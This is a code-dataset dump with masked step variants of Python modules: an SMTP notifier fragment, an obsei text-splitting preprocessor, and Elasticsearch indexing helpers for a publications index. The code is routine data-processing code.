' Bot'])\n\n #TODO deal with smtplib exceptions\n def connect(self):\n self.server = smtplib.SMTP(self.hostname)\n self.server.ehlo()\n self.server.starttls()\n self.server.login(self.username, self.passwd)\n self.connected = True\n\n #TODO implement saving messages to disk with timestamp if send fails\n #TODO deal with smtplib exceptions\n def notify(self, recipient, message):\n if not self.connected:\n raise NotifyError('Not connected to SMTP server; cannot send notifications')\n self.server.sendmail(self.address, \n\t\t\t\tself.contact_info[recipient]['address'], \n\t\t\t\tself.message_template.format(self.contact_info[recipient]['address'], self.contact_info[recipient]['name'], message)\n )\n\n #TODO deal with smtplib exceptions\n def close(self):\n if self.connected: \n self.server.quit()\n self.connected = False\n\n\n\n",
"step-ids": [
11,
12,
15,
20,
21
]
}
|
[
11,
12,
15,
20,
21
] |
import logging
from typing import List, Optional
import uuid
from pydantic import BaseModel
from obsei.payload import TextPayload
from obsei.preprocessor.base_preprocessor import (
BaseTextPreprocessor,
BaseTextProcessorConfig,
)
logger = logging.getLogger(__name__)
class TextSplitterPayload(BaseModel):
phrase: str
chunk_id: int
chunk_length: int
start_index: int
end_index: int
document_id: str
text_length: int
total_chunks: Optional[int]
class TextSplitterConfig(BaseTextProcessorConfig):
max_split_length: int = 512
split_stride: int = 0 # overlap length
document_id_key: Optional[str] # document_id in meta
class TextSplitter(BaseTextPreprocessor):
def preprocess_input( # type: ignore[override]
self, input_list: List[TextPayload], config: TextSplitterConfig, **kwargs
) -> List[TextPayload]:
text_splits: List[TextPayload] = []
for idx, input_data in enumerate(input_list):
if (
config.document_id_key
and input_data.meta
and config.document_id_key in input_data.meta
):
document_id = str(input_data.meta.get(config.document_id_key))
else:
document_id = uuid.uuid4().hex
start_idx = 0
split_id = 0
document_splits: List[TextSplitterPayload] = []
document_length = len(input_data.processed_text)
while start_idx < document_length:
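                # With a positive stride, back up past the previous chunk's end
                # (snapped to a word boundary) so consecutive chunks overlap.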
if config.split_stride > 0 and start_idx > 0:
start_idx = (
self._valid_index(
input_data.processed_text, start_idx - config.split_stride
)
+ 1
)
end_idx = self._valid_index(
input_data.processed_text,
min(start_idx + config.max_split_length, document_length),
)
phrase = input_data.processed_text[start_idx:end_idx]
document_splits.append(
TextSplitterPayload(
phrase=phrase,
chunk_id=split_id,
chunk_length=len(phrase),
start_index=start_idx,
end_index=end_idx,
document_id=document_id,
text_length=document_length,
)
)
start_idx = end_idx + 1
split_id += 1
total_splits = len(document_splits)
for split in document_splits:
split.total_chunks = total_splits
payload = TextPayload(
processed_text=split.phrase,
source_name=input_data.source_name,
segmented_data=input_data.segmented_data,
meta={**input_data.meta, **{"splitter": split}}
if input_data.meta
else {"splitter": split},
)
text_splits.append(payload)
return text_splits
@staticmethod
def _valid_index(document: str, idx: int):
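        # Clamp idx to the document bounds, then walk backwards to the nearest
        # whitespace so chunk boundaries never fall inside a word.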
if idx <= 0:
return 0
if idx >= len(document):
return len(document)
new_idx = idx
while new_idx > 0:
if document[new_idx] in [" ", "\n", "\t"]:
break
new_idx -= 1
return new_idx
|
normal
|
{
"blob_id": "151cc71ff1a63897238e2cc55269bd20cc6ee577",
"index": 2336,
"step-1": "<mask token>\n\n\nclass TextSplitterConfig(BaseTextProcessorConfig):\n max_split_length: int = 512\n split_stride: int = 0\n document_id_key: Optional[str]\n\n\nclass TextSplitter(BaseTextPreprocessor):\n\n def preprocess_input(self, input_list: List[TextPayload], config:\n TextSplitterConfig, **kwargs) ->List[TextPayload]:\n text_splits: List[TextPayload] = []\n for idx, input_data in enumerate(input_list):\n if (config.document_id_key and input_data.meta and config.\n document_id_key in input_data.meta):\n document_id = str(input_data.meta.get(config.document_id_key))\n else:\n document_id = uuid.uuid4().hex\n start_idx = 0\n split_id = 0\n document_splits: List[TextSplitterPayload] = []\n document_length = len(input_data.processed_text)\n while start_idx < document_length:\n if config.split_stride > 0 and start_idx > 0:\n start_idx = self._valid_index(input_data.processed_text,\n start_idx - config.split_stride) + 1\n end_idx = self._valid_index(input_data.processed_text, min(\n start_idx + config.max_split_length, document_length))\n phrase = input_data.processed_text[start_idx:end_idx]\n document_splits.append(TextSplitterPayload(phrase=phrase,\n chunk_id=split_id, chunk_length=len(phrase),\n start_index=start_idx, end_index=end_idx, document_id=\n document_id, text_length=document_length))\n start_idx = end_idx + 1\n split_id += 1\n total_splits = len(document_splits)\n for split in document_splits:\n split.total_chunks = total_splits\n payload = TextPayload(processed_text=split.phrase,\n source_name=input_data.source_name, segmented_data=\n input_data.segmented_data, meta={**input_data.meta, **{\n 'splitter': split}} if input_data.meta else {'splitter':\n split})\n text_splits.append(payload)\n return text_splits\n\n @staticmethod\n def _valid_index(document: str, idx: int):\n if idx <= 0:\n return 0\n if idx >= len(document):\n return len(document)\n new_idx = idx\n while new_idx > 0:\n if document[new_idx] in [' ', '\\n', '\\t']:\n break\n new_idx -= 1\n return new_idx\n",
"step-2": "<mask token>\n\n\nclass TextSplitterPayload(BaseModel):\n phrase: str\n chunk_id: int\n chunk_length: int\n start_index: int\n end_index: int\n document_id: str\n text_length: int\n total_chunks: Optional[int]\n\n\nclass TextSplitterConfig(BaseTextProcessorConfig):\n max_split_length: int = 512\n split_stride: int = 0\n document_id_key: Optional[str]\n\n\nclass TextSplitter(BaseTextPreprocessor):\n\n def preprocess_input(self, input_list: List[TextPayload], config:\n TextSplitterConfig, **kwargs) ->List[TextPayload]:\n text_splits: List[TextPayload] = []\n for idx, input_data in enumerate(input_list):\n if (config.document_id_key and input_data.meta and config.\n document_id_key in input_data.meta):\n document_id = str(input_data.meta.get(config.document_id_key))\n else:\n document_id = uuid.uuid4().hex\n start_idx = 0\n split_id = 0\n document_splits: List[TextSplitterPayload] = []\n document_length = len(input_data.processed_text)\n while start_idx < document_length:\n if config.split_stride > 0 and start_idx > 0:\n start_idx = self._valid_index(input_data.processed_text,\n start_idx - config.split_stride) + 1\n end_idx = self._valid_index(input_data.processed_text, min(\n start_idx + config.max_split_length, document_length))\n phrase = input_data.processed_text[start_idx:end_idx]\n document_splits.append(TextSplitterPayload(phrase=phrase,\n chunk_id=split_id, chunk_length=len(phrase),\n start_index=start_idx, end_index=end_idx, document_id=\n document_id, text_length=document_length))\n start_idx = end_idx + 1\n split_id += 1\n total_splits = len(document_splits)\n for split in document_splits:\n split.total_chunks = total_splits\n payload = TextPayload(processed_text=split.phrase,\n source_name=input_data.source_name, segmented_data=\n input_data.segmented_data, meta={**input_data.meta, **{\n 'splitter': split}} if input_data.meta else {'splitter':\n split})\n text_splits.append(payload)\n return text_splits\n\n @staticmethod\n def _valid_index(document: str, idx: int):\n if idx <= 0:\n return 0\n if idx >= len(document):\n return len(document)\n new_idx = idx\n while new_idx > 0:\n if document[new_idx] in [' ', '\\n', '\\t']:\n break\n new_idx -= 1\n return new_idx\n",
"step-3": "<mask token>\nlogger = logging.getLogger(__name__)\n\n\nclass TextSplitterPayload(BaseModel):\n phrase: str\n chunk_id: int\n chunk_length: int\n start_index: int\n end_index: int\n document_id: str\n text_length: int\n total_chunks: Optional[int]\n\n\nclass TextSplitterConfig(BaseTextProcessorConfig):\n max_split_length: int = 512\n split_stride: int = 0\n document_id_key: Optional[str]\n\n\nclass TextSplitter(BaseTextPreprocessor):\n\n def preprocess_input(self, input_list: List[TextPayload], config:\n TextSplitterConfig, **kwargs) ->List[TextPayload]:\n text_splits: List[TextPayload] = []\n for idx, input_data in enumerate(input_list):\n if (config.document_id_key and input_data.meta and config.\n document_id_key in input_data.meta):\n document_id = str(input_data.meta.get(config.document_id_key))\n else:\n document_id = uuid.uuid4().hex\n start_idx = 0\n split_id = 0\n document_splits: List[TextSplitterPayload] = []\n document_length = len(input_data.processed_text)\n while start_idx < document_length:\n if config.split_stride > 0 and start_idx > 0:\n start_idx = self._valid_index(input_data.processed_text,\n start_idx - config.split_stride) + 1\n end_idx = self._valid_index(input_data.processed_text, min(\n start_idx + config.max_split_length, document_length))\n phrase = input_data.processed_text[start_idx:end_idx]\n document_splits.append(TextSplitterPayload(phrase=phrase,\n chunk_id=split_id, chunk_length=len(phrase),\n start_index=start_idx, end_index=end_idx, document_id=\n document_id, text_length=document_length))\n start_idx = end_idx + 1\n split_id += 1\n total_splits = len(document_splits)\n for split in document_splits:\n split.total_chunks = total_splits\n payload = TextPayload(processed_text=split.phrase,\n source_name=input_data.source_name, segmented_data=\n input_data.segmented_data, meta={**input_data.meta, **{\n 'splitter': split}} if input_data.meta else {'splitter':\n split})\n text_splits.append(payload)\n return text_splits\n\n @staticmethod\n def _valid_index(document: str, idx: int):\n if idx <= 0:\n return 0\n if idx >= len(document):\n return len(document)\n new_idx = idx\n while new_idx > 0:\n if document[new_idx] in [' ', '\\n', '\\t']:\n break\n new_idx -= 1\n return new_idx\n",
"step-4": "import logging\nfrom typing import List, Optional\nimport uuid\nfrom pydantic import BaseModel\nfrom obsei.payload import TextPayload\nfrom obsei.preprocessor.base_preprocessor import BaseTextPreprocessor, BaseTextProcessorConfig\nlogger = logging.getLogger(__name__)\n\n\nclass TextSplitterPayload(BaseModel):\n phrase: str\n chunk_id: int\n chunk_length: int\n start_index: int\n end_index: int\n document_id: str\n text_length: int\n total_chunks: Optional[int]\n\n\nclass TextSplitterConfig(BaseTextProcessorConfig):\n max_split_length: int = 512\n split_stride: int = 0\n document_id_key: Optional[str]\n\n\nclass TextSplitter(BaseTextPreprocessor):\n\n def preprocess_input(self, input_list: List[TextPayload], config:\n TextSplitterConfig, **kwargs) ->List[TextPayload]:\n text_splits: List[TextPayload] = []\n for idx, input_data in enumerate(input_list):\n if (config.document_id_key and input_data.meta and config.\n document_id_key in input_data.meta):\n document_id = str(input_data.meta.get(config.document_id_key))\n else:\n document_id = uuid.uuid4().hex\n start_idx = 0\n split_id = 0\n document_splits: List[TextSplitterPayload] = []\n document_length = len(input_data.processed_text)\n while start_idx < document_length:\n if config.split_stride > 0 and start_idx > 0:\n start_idx = self._valid_index(input_data.processed_text,\n start_idx - config.split_stride) + 1\n end_idx = self._valid_index(input_data.processed_text, min(\n start_idx + config.max_split_length, document_length))\n phrase = input_data.processed_text[start_idx:end_idx]\n document_splits.append(TextSplitterPayload(phrase=phrase,\n chunk_id=split_id, chunk_length=len(phrase),\n start_index=start_idx, end_index=end_idx, document_id=\n document_id, text_length=document_length))\n start_idx = end_idx + 1\n split_id += 1\n total_splits = len(document_splits)\n for split in document_splits:\n split.total_chunks = total_splits\n payload = TextPayload(processed_text=split.phrase,\n source_name=input_data.source_name, segmented_data=\n input_data.segmented_data, meta={**input_data.meta, **{\n 'splitter': split}} if input_data.meta else {'splitter':\n split})\n text_splits.append(payload)\n return text_splits\n\n @staticmethod\n def _valid_index(document: str, idx: int):\n if idx <= 0:\n return 0\n if idx >= len(document):\n return len(document)\n new_idx = idx\n while new_idx > 0:\n if document[new_idx] in [' ', '\\n', '\\t']:\n break\n new_idx -= 1\n return new_idx\n",
"step-5": "import logging\nfrom typing import List, Optional\nimport uuid\n\nfrom pydantic import BaseModel\n\nfrom obsei.payload import TextPayload\nfrom obsei.preprocessor.base_preprocessor import (\n BaseTextPreprocessor,\n BaseTextProcessorConfig,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass TextSplitterPayload(BaseModel):\n phrase: str\n chunk_id: int\n chunk_length: int\n start_index: int\n end_index: int\n document_id: str\n text_length: int\n total_chunks: Optional[int]\n\n\nclass TextSplitterConfig(BaseTextProcessorConfig):\n max_split_length: int = 512\n split_stride: int = 0 # overlap length\n document_id_key: Optional[str] # document_id in meta\n\n\nclass TextSplitter(BaseTextPreprocessor):\n def preprocess_input( # type: ignore[override]\n self, input_list: List[TextPayload], config: TextSplitterConfig, **kwargs\n ) -> List[TextPayload]:\n text_splits: List[TextPayload] = []\n for idx, input_data in enumerate(input_list):\n if (\n config.document_id_key\n and input_data.meta\n and config.document_id_key in input_data.meta\n ):\n document_id = str(input_data.meta.get(config.document_id_key))\n else:\n document_id = uuid.uuid4().hex\n start_idx = 0\n split_id = 0\n document_splits: List[TextSplitterPayload] = []\n document_length = len(input_data.processed_text)\n while start_idx < document_length:\n if config.split_stride > 0 and start_idx > 0:\n start_idx = (\n self._valid_index(\n input_data.processed_text, start_idx - config.split_stride\n )\n + 1\n )\n end_idx = self._valid_index(\n input_data.processed_text,\n min(start_idx + config.max_split_length, document_length),\n )\n\n phrase = input_data.processed_text[start_idx:end_idx]\n document_splits.append(\n TextSplitterPayload(\n phrase=phrase,\n chunk_id=split_id,\n chunk_length=len(phrase),\n start_index=start_idx,\n end_index=end_idx,\n document_id=document_id,\n text_length=document_length,\n )\n )\n start_idx = end_idx + 1\n split_id += 1\n\n total_splits = len(document_splits)\n for split in document_splits:\n split.total_chunks = total_splits\n payload = TextPayload(\n processed_text=split.phrase,\n source_name=input_data.source_name,\n segmented_data=input_data.segmented_data,\n meta={**input_data.meta, **{\"splitter\": split}}\n if input_data.meta\n else {\"splitter\": split},\n )\n text_splits.append(payload)\n\n return text_splits\n\n @staticmethod\n def _valid_index(document: str, idx: int):\n if idx <= 0:\n return 0\n if idx >= len(document):\n return len(document)\n new_idx = idx\n while new_idx > 0:\n if document[new_idx] in [\" \", \"\\n\", \"\\t\"]:\n break\n new_idx -= 1\n return new_idx\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from elasticsearch import Elasticsearch, helpers
from bso.server.main.config import ES_LOGIN_BSO_BACK, ES_PASSWORD_BSO_BACK, ES_URL
from bso.server.main.decorator import exception_handler
from bso.server.main.logger import get_logger
client = None
logger = get_logger(__name__)
@exception_handler
def get_client():
global client
if client is None:
client = Elasticsearch(ES_URL, http_auth=(ES_LOGIN_BSO_BACK, ES_PASSWORD_BSO_BACK))
return client
@exception_handler
def get_doi_not_in_index(index, dois):
es = get_client()
results = es.search(
index=index,
body={"query": {"bool": {"filter": [{'terms': {'doi.keyword': dois}}]}}, "fields": ['doi'], "size": len(dois),
"_source": False},
request_timeout=60*5
)
existing_dois = set([e['fields']['doi'][0] for e in results['hits']['hits']])
not_indexed_dois = set(dois) - existing_dois
res = []
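    # Re-check every candidate DOI individually (bypassing the request cache)
    # to weed out false negatives from the bulk terms query.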
for doi in list(not_indexed_dois):
res += get_doi_not_in_index_one(index, doi)
logger.debug(f'{len(res)} dois not in index detected')
return res
@exception_handler
def get_doi_not_in_index_one(index, doi):
es = get_client()
results = es.search(
index=index,
request_cache=False,
body={"query": {"bool": {"filter": [{'term': {'doi.keyword': doi}}]}}, "fields": ['doi'], "_source": True},
request_timeout=60*5
)
existing_dois = set([e['fields']['doi'][0] for e in results['hits']['hits']])
not_indexed_dois = set([doi]) - existing_dois
return list(not_indexed_dois)
@exception_handler
def update_local_affiliations(index, current_dois, local_affiliations):
es = get_client()
logger.debug(f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois')
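    # The painless script appends the new affiliations, then de-duplicates and
    # sorts the list in place on every document matched by the terms query.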
    body = {
        "conflicts": "proceed",  # request-level option, not a script field
        "script": {
            "lang": "painless",
            "inline": "if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations ="
                      " new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);"
                      "ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct()"
                      ".sorted().collect(Collectors.toList())",
            "params": {"local_affiliations": local_affiliations}
        },
        "query": {
            "bool": {
                "filter": [{
                    "terms": {
                        "doi.keyword": current_dois
                    }
                }]
            }
        }
    }
    es.update_by_query(index=index, body=body, refresh=True, request_timeout=60*5)
@exception_handler
def delete_index(index: str) -> None:
logger.debug(f'Deleting {index}')
es = get_client()
response = es.indices.delete(index=index, ignore=[400, 404])
logger.debug(response)
@exception_handler
def update_alias(alias: str, old_index: str, new_index: str) -> None:
es = get_client()
logger.debug(f'updating alias {alias} from {old_index} to {new_index}')
response = es.indices.update_aliases({
'actions': [
{'remove': {'index': old_index, 'alias': alias}},
{'add': {'index': new_index, 'alias': alias}}
]
})
logger.debug(response)
def get_analyzers() -> dict:
return {
'light': {
'tokenizer': 'icu_tokenizer',
'filter': [
'lowercase',
'french_elision',
'icu_folding'
]
}
}
def get_filters() -> dict:
return {
'french_elision': {
'type': 'elision',
'articles_case': True,
'articles': ['l', 'm', 't', 'qu', 'n', 's', 'j', 'd', 'c', 'jusqu', 'quoiqu', 'lorsqu', 'puisqu']
}
}
@exception_handler
def reset_index(index: str) -> None:
es = get_client()
delete_index(index)
settings = {
'analysis': {
'filter': get_filters(),
'analyzer': get_analyzers()
}
}
dynamic_match = None
if 'bso-publications' in index:
# dynamic_match = "*oa_locations"
dynamic_match = None
elif 'publications-' in index:
dynamic_match = "*authors"
mappings = { 'properties': {} }
    # warning: the .keyword sub-field will not be present for these analyzed fields!
for f in ['title', 'affiliations.name', 'authors.first_name', 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:
mappings['properties'][f] = {
'type': 'text',
'analyzer': 'light'
}
if dynamic_match:
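        # Index matching objects (e.g. *authors) as `nested` so queries on
        # author sub-fields cannot cross-match values from different authors.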
mappings["dynamic_templates"] = [
{
"objects": {
"match": dynamic_match,
"match_mapping_type": "object",
"mapping": {
"type": "nested"
}
}
}
]
response = es.indices.create(
index=index,
body={'settings': settings, 'mappings': mappings},
ignore=400 # ignore 400 already exists code
)
if 'acknowledged' in response and response['acknowledged']:
response = str(response['index'])
logger.debug(f'Index mapping success for index: {response}')
@exception_handler
def load_in_es(data: list, index: str) -> list:
es = get_client()
actions = [{'_index': index, '_source': datum} for datum in data]
ix = 0
indexed = []
for success, info in helpers.parallel_bulk(client=es, actions=actions, chunk_size=500, request_timeout=60,
raise_on_error=False):
if not success:
logger.debug(f'A document failed: {info}')
else:
indexed.append(data[ix])
ix += 1
logger.debug(f'{len(data)} elements imported into {index}')
return indexed
|
normal
|
{
"blob_id": "9f760c0cf2afc746a1fc19ac68d1b2f406c7efe1",
"index": 5767,
"step-1": "<mask token>\n\n\n@exception_handler\ndef get_doi_not_in_index(index, dois):\n es = get_client()\n results = es.search(index=index, body={'query': {'bool': {'filter': [{\n 'terms': {'doi.keyword': dois}}]}}, 'fields': ['doi'], 'size': len(\n dois), '_source': False}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set(dois) - existing_dois\n res = []\n for doi in list(not_indexed_dois):\n res += get_doi_not_in_index_one(index, doi)\n logger.debug(f'{len(res)} dois not in index detected')\n return res\n\n\n@exception_handler\ndef get_doi_not_in_index_one(index, doi):\n es = get_client()\n results = es.search(index=index, request_cache=False, body={'query': {\n 'bool': {'filter': [{'term': {'doi.keyword': doi}}]}}, 'fields': [\n 'doi'], '_source': True}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set([doi]) - existing_dois\n return list(not_indexed_dois)\n\n\n@exception_handler\ndef update_local_affiliations(index, current_dois, local_affiliations):\n es = get_client()\n logger.debug(\n f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois'\n )\n body = {'script': {'lang': 'painless', 'refresh': True, 'conflicts':\n 'proceed', 'inline':\n 'if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations = new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct().sorted().collect(Collectors.toList())'\n , 'params': {'local_affiliations': local_affiliations}}, 'query': {\n 'bool': {'filter': [{'terms': {'doi.keyword': current_dois}}]}}}\n es.update_by_query(index=index, body=body, request_timeout=60 * 5)\n\n\n@exception_handler\ndef delete_index(index: str) ->None:\n logger.debug(f'Deleting {index}')\n es = get_client()\n response = es.indices.delete(index=index, ignore=[400, 404])\n logger.debug(response)\n\n\n<mask token>\n\n\ndef get_analyzers() ->dict:\n return {'light': {'tokenizer': 'icu_tokenizer', 'filter': ['lowercase',\n 'french_elision', 'icu_folding']}}\n\n\n<mask token>\n\n\n@exception_handler\ndef reset_index(index: str) ->None:\n es = get_client()\n delete_index(index)\n settings = {'analysis': {'filter': get_filters(), 'analyzer':\n get_analyzers()}}\n dynamic_match = None\n if 'bso-publications' in index:\n dynamic_match = None\n elif 'publications-' in index:\n dynamic_match = '*authors'\n mappings = {'properties': {}}\n for f in ['title', 'affiliations.name', 'authors.first_name',\n 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:\n mappings['properties'][f] = {'type': 'text', 'analyzer': 'light'}\n if dynamic_match:\n mappings['dynamic_templates'] = [{'objects': {'match':\n dynamic_match, 'match_mapping_type': 'object', 'mapping': {\n 'type': 'nested'}}}]\n response = es.indices.create(index=index, body={'settings': settings,\n 'mappings': mappings}, ignore=400)\n if 'acknowledged' in response and response['acknowledged']:\n response = str(response['index'])\n logger.debug(f'Index mapping success for index: {response}')\n\n\n@exception_handler\ndef load_in_es(data: list, index: str) ->list:\n es = get_client()\n actions = [{'_index': index, '_source': datum} for datum in data]\n ix = 0\n indexed = []\n for success, info in helpers.parallel_bulk(client=es, actions=actions,\n chunk_size=500, request_timeout=60, 
raise_on_error=False):\n if not success:\n logger.debug(f'A document failed: {info}')\n else:\n indexed.append(data[ix])\n ix += 1\n logger.debug(f'{len(data)} elements imported into {index}')\n return indexed\n",
"step-2": "<mask token>\n\n\n@exception_handler\ndef get_doi_not_in_index(index, dois):\n es = get_client()\n results = es.search(index=index, body={'query': {'bool': {'filter': [{\n 'terms': {'doi.keyword': dois}}]}}, 'fields': ['doi'], 'size': len(\n dois), '_source': False}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set(dois) - existing_dois\n res = []\n for doi in list(not_indexed_dois):\n res += get_doi_not_in_index_one(index, doi)\n logger.debug(f'{len(res)} dois not in index detected')\n return res\n\n\n@exception_handler\ndef get_doi_not_in_index_one(index, doi):\n es = get_client()\n results = es.search(index=index, request_cache=False, body={'query': {\n 'bool': {'filter': [{'term': {'doi.keyword': doi}}]}}, 'fields': [\n 'doi'], '_source': True}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set([doi]) - existing_dois\n return list(not_indexed_dois)\n\n\n@exception_handler\ndef update_local_affiliations(index, current_dois, local_affiliations):\n es = get_client()\n logger.debug(\n f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois'\n )\n body = {'script': {'lang': 'painless', 'refresh': True, 'conflicts':\n 'proceed', 'inline':\n 'if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations = new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct().sorted().collect(Collectors.toList())'\n , 'params': {'local_affiliations': local_affiliations}}, 'query': {\n 'bool': {'filter': [{'terms': {'doi.keyword': current_dois}}]}}}\n es.update_by_query(index=index, body=body, request_timeout=60 * 5)\n\n\n@exception_handler\ndef delete_index(index: str) ->None:\n logger.debug(f'Deleting {index}')\n es = get_client()\n response = es.indices.delete(index=index, ignore=[400, 404])\n logger.debug(response)\n\n\n<mask token>\n\n\ndef get_analyzers() ->dict:\n return {'light': {'tokenizer': 'icu_tokenizer', 'filter': ['lowercase',\n 'french_elision', 'icu_folding']}}\n\n\ndef get_filters() ->dict:\n return {'french_elision': {'type': 'elision', 'articles_case': True,\n 'articles': ['l', 'm', 't', 'qu', 'n', 's', 'j', 'd', 'c', 'jusqu',\n 'quoiqu', 'lorsqu', 'puisqu']}}\n\n\n@exception_handler\ndef reset_index(index: str) ->None:\n es = get_client()\n delete_index(index)\n settings = {'analysis': {'filter': get_filters(), 'analyzer':\n get_analyzers()}}\n dynamic_match = None\n if 'bso-publications' in index:\n dynamic_match = None\n elif 'publications-' in index:\n dynamic_match = '*authors'\n mappings = {'properties': {}}\n for f in ['title', 'affiliations.name', 'authors.first_name',\n 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:\n mappings['properties'][f] = {'type': 'text', 'analyzer': 'light'}\n if dynamic_match:\n mappings['dynamic_templates'] = [{'objects': {'match':\n dynamic_match, 'match_mapping_type': 'object', 'mapping': {\n 'type': 'nested'}}}]\n response = es.indices.create(index=index, body={'settings': settings,\n 'mappings': mappings}, ignore=400)\n if 'acknowledged' in response and response['acknowledged']:\n response = str(response['index'])\n logger.debug(f'Index mapping success for index: {response}')\n\n\n@exception_handler\ndef load_in_es(data: list, index: str) ->list:\n es = get_client()\n actions = 
[{'_index': index, '_source': datum} for datum in data]\n ix = 0\n indexed = []\n for success, info in helpers.parallel_bulk(client=es, actions=actions,\n chunk_size=500, request_timeout=60, raise_on_error=False):\n if not success:\n logger.debug(f'A document failed: {info}')\n else:\n indexed.append(data[ix])\n ix += 1\n logger.debug(f'{len(data)} elements imported into {index}')\n return indexed\n",
"step-3": "<mask token>\n\n\n@exception_handler\ndef get_client():\n global client\n if client is None:\n client = Elasticsearch(ES_URL, http_auth=(ES_LOGIN_BSO_BACK,\n ES_PASSWORD_BSO_BACK))\n return client\n\n\n@exception_handler\ndef get_doi_not_in_index(index, dois):\n es = get_client()\n results = es.search(index=index, body={'query': {'bool': {'filter': [{\n 'terms': {'doi.keyword': dois}}]}}, 'fields': ['doi'], 'size': len(\n dois), '_source': False}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set(dois) - existing_dois\n res = []\n for doi in list(not_indexed_dois):\n res += get_doi_not_in_index_one(index, doi)\n logger.debug(f'{len(res)} dois not in index detected')\n return res\n\n\n@exception_handler\ndef get_doi_not_in_index_one(index, doi):\n es = get_client()\n results = es.search(index=index, request_cache=False, body={'query': {\n 'bool': {'filter': [{'term': {'doi.keyword': doi}}]}}, 'fields': [\n 'doi'], '_source': True}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set([doi]) - existing_dois\n return list(not_indexed_dois)\n\n\n@exception_handler\ndef update_local_affiliations(index, current_dois, local_affiliations):\n es = get_client()\n logger.debug(\n f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois'\n )\n body = {'script': {'lang': 'painless', 'refresh': True, 'conflicts':\n 'proceed', 'inline':\n 'if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations = new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct().sorted().collect(Collectors.toList())'\n , 'params': {'local_affiliations': local_affiliations}}, 'query': {\n 'bool': {'filter': [{'terms': {'doi.keyword': current_dois}}]}}}\n es.update_by_query(index=index, body=body, request_timeout=60 * 5)\n\n\n@exception_handler\ndef delete_index(index: str) ->None:\n logger.debug(f'Deleting {index}')\n es = get_client()\n response = es.indices.delete(index=index, ignore=[400, 404])\n logger.debug(response)\n\n\n<mask token>\n\n\ndef get_analyzers() ->dict:\n return {'light': {'tokenizer': 'icu_tokenizer', 'filter': ['lowercase',\n 'french_elision', 'icu_folding']}}\n\n\ndef get_filters() ->dict:\n return {'french_elision': {'type': 'elision', 'articles_case': True,\n 'articles': ['l', 'm', 't', 'qu', 'n', 's', 'j', 'd', 'c', 'jusqu',\n 'quoiqu', 'lorsqu', 'puisqu']}}\n\n\n@exception_handler\ndef reset_index(index: str) ->None:\n es = get_client()\n delete_index(index)\n settings = {'analysis': {'filter': get_filters(), 'analyzer':\n get_analyzers()}}\n dynamic_match = None\n if 'bso-publications' in index:\n dynamic_match = None\n elif 'publications-' in index:\n dynamic_match = '*authors'\n mappings = {'properties': {}}\n for f in ['title', 'affiliations.name', 'authors.first_name',\n 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:\n mappings['properties'][f] = {'type': 'text', 'analyzer': 'light'}\n if dynamic_match:\n mappings['dynamic_templates'] = [{'objects': {'match':\n dynamic_match, 'match_mapping_type': 'object', 'mapping': {\n 'type': 'nested'}}}]\n response = es.indices.create(index=index, body={'settings': settings,\n 'mappings': mappings}, ignore=400)\n if 'acknowledged' in response and response['acknowledged']:\n response = 
str(response['index'])\n logger.debug(f'Index mapping success for index: {response}')\n\n\n@exception_handler\ndef load_in_es(data: list, index: str) ->list:\n es = get_client()\n actions = [{'_index': index, '_source': datum} for datum in data]\n ix = 0\n indexed = []\n for success, info in helpers.parallel_bulk(client=es, actions=actions,\n chunk_size=500, request_timeout=60, raise_on_error=False):\n if not success:\n logger.debug(f'A document failed: {info}')\n else:\n indexed.append(data[ix])\n ix += 1\n logger.debug(f'{len(data)} elements imported into {index}')\n return indexed\n",
"step-4": "<mask token>\nclient = None\nlogger = get_logger(__name__)\n\n\n@exception_handler\ndef get_client():\n global client\n if client is None:\n client = Elasticsearch(ES_URL, http_auth=(ES_LOGIN_BSO_BACK,\n ES_PASSWORD_BSO_BACK))\n return client\n\n\n@exception_handler\ndef get_doi_not_in_index(index, dois):\n es = get_client()\n results = es.search(index=index, body={'query': {'bool': {'filter': [{\n 'terms': {'doi.keyword': dois}}]}}, 'fields': ['doi'], 'size': len(\n dois), '_source': False}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for e in results['hits'][\n 'hits']])\n not_indexed_dois = set(dois) - existing_dois\n res = []\n for doi in list(not_indexed_dois):\n res += get_doi_not_in_index_one(index, doi)\n logger.debug(f'{len(res)} dois not in index detected')\n return res\n\n\n@exception_handler\ndef get_doi_not_in_index_one(index, doi):\n es = get_client()\n results = es.search(index=index, request_cache=False, body={'query': {\n 'bool': {'filter': [{'term': {'doi.keyword': doi}}]}}, 'fields': [\n 'doi'], '_source': True}, request_timeout=60 * 5)\n existing_dois = set([e['fields']['doi'][0] for 